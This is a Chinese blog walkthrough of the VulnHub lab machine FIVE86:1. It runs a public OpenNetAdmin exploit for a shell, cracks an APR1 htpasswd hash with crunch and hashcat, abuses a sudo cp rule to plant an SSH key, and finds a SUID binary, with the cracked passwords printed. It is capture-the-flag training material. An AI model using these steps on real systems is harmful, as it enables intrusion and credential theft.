【vulnhub】FIVE86: 1

📒博客主页：开心星人的博客主页
🔥系列专栏：vulnhub
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年7月15日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

跟着这篇打靶的

靶机为桥接模式，配置kali为桥接模式

主机发现arp-scan -l

端口扫描nmap -p- -sV 192.168.1.103

开放了22、80、1000端口

访问80端口，一片空白
进行目录扫描dirb http://192.168.1.103

访问reports，需要登录

访问robots.txt

访问ona


知道了这是 opennetadmin

searchsploit opennetadmin

searchsploit -x php/webapps/47691.sh //查看脚本内容

locate php/webapps/47691.sh //查看脚本路径

我们指定一个url即可
bash /usr/share/exploitdb/exploits/php/webapps/47691.sh http://192.168.1.103/ona/

直接拿到shell

ls /home
有这几个用户
douglas、jen、moss、richmond、roy

尝试用sudo、suid提权，不行

find / -type f -user www-data查看当前用户可以读取的文件
/proc目录、/var/www/html/reports/.htaccess和/var/log/ona.log

cat /var/www/html/reports/.htaccess

告诉我们/var/www/.htpasswd文件

cat /var/www/.htpasswd

告诉我们用户名和密码
提示我们怎么去爆破hash

密码长度为10，由aefhrt组成
使用crunch生成字典
crunch 10 10 aefhrt -o password.txt

hash-identifier判断hash类型

MD5(APR)

使用hashcat进行爆破
hashcat -h | grep APR 查找MD5（APR）的编号

将$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1写入hash.txt

hashcat -m 1600 -a 0 -o jieguo.txt hash.txt password.txt  --force
hashcat -m 1600 -a 0  hash.txt password.txt  --force --show 
-m        指定hash模式
-a        指定破解模式，0为用字典爆破
-o        结果输出到文件
--force   忽略警告信息

结果：fatherrrrr

douglas:fatherrrrr
可以登录上reports

登录ssh
ssh douglas@192.168.1.103

登录成功，没有发现什么铭感文件

尝试提权
sudo -l

(jen) NOPASSWD: /bin/cp //有jen用户的cp权限

把douglas的ssh公钥拷到jen中，实现ssh免密登录

cp .ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys 
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/

成功
t提示我们有一封邮件
cd /var/mail/

告诉我们moss的密码为Fire!Fire!

直接使用su切换，不要再用ssh了

去家目录发现.game

total 28
drwx------ 2 moss moss  4096 Jan  1  2020 .
drwx------ 3 moss moss  4096 Jan  1  2020 ..
lrwxrwxrwx 1 moss moss    21 Jan  1  2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss    14 Jan  1  2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss    21 Jan  1  2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss    17 Jan  1  2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss    20 Jan  1  2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss    15 Jan  1  2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss    20 Jan  1  2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss    17 Jan  1  2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss    25 Jan  1  2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss    17 Jan  1  2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss    16 Jan  1  2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss    17 Jan  1  2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 16824 Jan  1  2020 upyourgame
lrwxrwxrwx 1 moss moss    16 Jan  1  2020 worms -> /usr/games/worms

upyourgame是root权限执行的

结束